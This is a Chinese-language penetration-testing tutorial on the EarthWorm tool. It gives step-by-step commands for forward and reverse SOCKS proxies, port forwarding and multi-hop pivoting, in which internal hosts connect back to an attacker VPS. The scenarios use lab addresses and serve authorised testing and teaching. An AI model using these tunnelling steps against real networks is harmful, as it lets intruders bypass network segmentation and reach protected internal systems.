内网渗透:使用ew实现socks代理
字数 1345 2025-08-15 21:30:47
EarthWorm (EW) 内网渗透代理工具使用指南
一、工具概述
EarthWorm (简称EW) 是一款功能强大的内网穿透工具,主要用于建立SOCKS代理通道,实现内网渗透。与reGeorg相比,EW具有以下特点:
- 服务端和客户端使用相同的可执行文件
- 不需要跳板机运行web服务
- 支持更复杂的渗透任务
- 支持多平台(Windows/Linux/Mac)
二、下载与安装
下载来源:
- CSDN: download.csdn.com
- GitHub
三、核心功能模式
EW提供6种工作模式,通过-s参数指定:
SOCKS代理功能
ssocksd- 正向SOCKS代理rcsocks- 反向SOCKS代理服务端rssocks- 反向SOCKS代理客户端
端口转发功能
lcx_slave- 端口转发从端lcx_tran- 端口转发中转lcx_listen- 端口转发监听端
四、使用场景详解
场景1:正向代理(攻击者→跳板机→目标机)
网络拓扑:
- 攻击者:192.168.1.7(外网)
- 跳板机:192.168.1.8(公网IP),192.168.56.113(内网IP)
- 目标机:192.168.56.101(内网)
操作步骤:
- 跳板机操作:
./ew -s ssocksd -l 8888 # 在8888端口开启SOCKS5代理
- 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 8888
- 使用代理访问:
proxychains telnet 192.168.56.101
注意事项:
- Linux跳板机需开启IP转发功能
场景2:反向代理(攻击者→跳板机←内网跳板→目标机)
网络拓扑:
- 攻击者:192.168.1.7
- 跳板机:192.168.1.8
- 内网跳板:10.0.2.15
- 目标机:192.168.1.9
操作步骤:
- 跳板机操作:
./ew -s rcsocks -l 1080 -e 8888 # 监听1080,等待8888连接
- 内网跳板操作:
./ew -s rssocks -d 192.168.1.8 -e 8888 # 连接跳板机8888端口
- 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 1080
场景3:跳板机主动连接内网跳板(攻击者→跳板机→内网跳板→目标机)
网络拓扑:
- 攻击者:192.168.1.7
- 跳板机:192.168.1.8/192.168.56.113
- 内网跳板:192.168.56.107
- 目标机:192.168.56.101
操作步骤:
- 内网跳板操作:
./ew -s ssocksd -l 8888 # 开启8888端口SOCKS代理
- 跳板机操作:
./ew -s lcx_tran -l 1080 -f 192.168.56.107 -g 8888 # 转发1080到内网跳板
- 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 1080
场景4:多级跳板穿透(攻击者→VPS←主机A→主机B→目标机)
网络拓扑:
- 攻击者:192.168.1.7
- VPS:192.168.1.8
- 主机A:192.168.56.114(可出网)
- 主机B:192.168.56.107(可访问目标)
- 目标机:192.168.56.101
操作步骤:
- VPS操作:
./ew -s lcx_listen -l 1080 -e 8888 # 监听1080,转发到8888
- 主机B操作:
ew -s ssocksd -l 9999 # 开启9999端口SOCKS代理
- 主机A操作:
route add 192.168.1.0 mask 255.255.255.0 192.168.56.1 # 添加路由
ew -s lcx_slave -d 192.168.1.8 -e 8888 -f 192.168.56.107 -g 9999 # 连接VPS和主机B
- 攻击者配置proxychains:
# /etc/proxychains.conf
socks5 192.168.1.8 1080
五、实用技巧
- 端口选择:尽量使用1024以上端口,避免需要root权限
- 路由配置:复杂内网环境可能需要手动添加路由
- 协议选择:EW默认使用SOCKS5协议,比SOCKS4更安全
- 多级穿透:在严格网络隔离环境下,可能需要多台跳板协作
六、注意事项
-
实际渗透中可能遇到:
- 严格的路由控制(无默认路由)
- 不同安全域间的防火墙限制
- 需要多节点配合绕过限制
-
Linux系统需确保IP转发功能开启:
echo 1 > /proc/sys/net/ipv4/ip_forward
- 工具使用需遵守当地法律法规,仅用于授权测试
通过灵活组合EW的6种工作模式,可以应对各种复杂的内网穿透场景,实现高效的内网渗透。